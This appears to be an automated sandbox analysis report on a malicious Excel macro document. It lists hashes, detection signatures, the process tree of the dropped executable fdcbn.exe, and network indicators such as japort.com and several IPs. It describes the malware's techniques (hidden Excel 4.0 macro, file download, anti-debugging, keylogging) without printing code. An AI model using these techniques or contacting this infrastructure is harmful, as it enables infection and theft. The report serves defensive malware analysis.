Loading ...

Play interactive tourEdit tour

Analysis Report request_form_1611565093.xlsm

Overview

General Information

Sample Name:request_form_1611565093.xlsm
Analysis ID:343657
MD5:9c47eef4c66e4587ecddb55cfc3ef1e6
SHA1:da444ad39f513282d1918beceadc0ceb6edc0d3d
SHA256:042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4640 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • fdcbn.exe (PID: 4872 cmdline: 'C:\otrgh\sdgvjk\fdcbn.exe' MD5: DC74FAE0ADA0A2426E77588E3797E040)
      • fdcbn.exe (PID: 5384 cmdline: 'C:\otrgh\sdgvjk\fdcbn.exe' MD5: DC74FAE0ADA0A2426E77588E3797E040)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: fdcbn.exe PID: 4872JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    Process Memory Space: fdcbn.exe PID: 5384JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      Compliance:

      barindex
      Uses new MSVCR DllsShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 50.87.232.245:443 -> 192.168.2.3:49722 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: kernel32.pdbUGP source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
      Source: Binary string: dnsapi.pdbUGP source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
      Source: Binary string: wininet.pdb source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
      Source: Binary string: ws2_32.pdb source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
      Source: Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7`d source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp
      Source: Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp, 9ght3erd[1].exe.0.dr
      Source: Binary string: Dw=helpvolumelabelmasteredudfUDFJOLIETItemPosItemOrder%s (%d).%sData\Program Files\Data\Windows\Program Files\Data\Program Files (x86)\Data\ProgramData\.cdxml.cer.automaticdestinations-ms.cat.dmp.cookie.customdestinations-msWindows\$Windows.~BT\Program Files (x86)\ProgramData\.appxbundle.appxpackageWindows.old\.appx.msip.msm.ocx.olb.mui.nst.etl.fon.dsft.efi.mpb.mp.partial.pdb.p7s.p7x.pfx.pem.pfm.p10.p12.ost.otf.p7m.p7r.p7b.p7c.sys.ttc.spkg.sst.vmrs.vsi.vmcx.psd1.psf.sft.spc.rll.wim.winmd.vsix.wfsWININET.xap\shellL source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
      Source: Binary string: ntdll.pdbUGP source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
      Source: Binary string: ole32.pdbUGP source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
      Source: Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7 source: 9ght3erd[1].exe.0.dr
      Source: Binary string: ole32.pdb source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
      Source: Binary string: advapi32.pdb source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
      Source: Binary string: shell32.pdb source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
      Source: Binary string: user32.pdb source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
      Source: Binary string: crypt32.pdbUGP source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
      Source: Binary string: advapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
      Source: Binary string: dnsapi.pdb source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
      Source: Binary string: netapi32.pdb source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
      Source: Binary string: ntdll.pdb source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
      Source: Binary string: netapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
      Source: Binary string: kernel32.pdb source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
      Source: Binary string: user32.pdbUGP source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
      Source: Binary string: wininet.pdbUGP source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
      Source: Binary string: ws2_32.pdbUGP source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
      Source: Binary string: bcrypt.pdbUGP source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
      Source: Binary string: shell32.pdbUGP source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
      Source: Binary string: crypt32.pdb source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: z:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: x:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: v:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: t:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: r:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: p:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: n:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: l:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: j:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: h:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: f:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: b:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: y:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: w:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: u:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: s:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: q:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: o:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: m:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: k:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: i:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: g:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: e:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: c:Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: a:Jump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (creates forbidden files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exeJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\otrgh\sdgvjk\fdcbn.exeJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exeJump to behavior
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 9ght3erd[1].exe.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\otrgh\sdgvjk\fdcbn.exeJump to behavior
      Source: global trafficDNS query: name: japort.com
      Source: global trafficTCP traffic: 192.168.2.3:49722 -> 50.87.232.245:443
      Source: global trafficTCP traffic: 192.168.2.3:49722 -> 50.87.232.245:443
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownTCP traffic detected without corresponding DNS query: 3.19.60.159
      Source: unknownTCP traffic detected without corresponding DNS query: 3.19.60.159
      Source: unknownTCP traffic detected without corresponding DNS query: 3.19.60.159
      Source: unknownTCP traffic detected without corresponding DNS query: 3.14.70.198
      Source: unknownTCP traffic detected without corresponding DNS query: 3.14.70.198
      Source: unknownTCP traffic detected without corresponding DNS query: 3.14.70.198
      Source: unknownTCP traffic detected without corresponding DNS query: 3.19.60.159
      Source: unknownTCP traffic detected without corresponding DNS query: 3.19.60.159
      Source: unknownTCP traffic detected without corresponding DNS query: 3.19.60.159
      Source: unknownTCP traffic detected without corresponding DNS query: 3.14.70.198
      Source: unknownTCP traffic detected without corresponding DNS query: 3.14.70.198
      Source: unknownDNS traffic detected: queries for: japort.com
      Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmpString found in binary or memory: http://.css
      Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmpString found in binary or memory: http://.jpg
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrlSoftware
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
      Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmpString found in binary or memory: http://html4/loose.dtd
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.accv.es0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
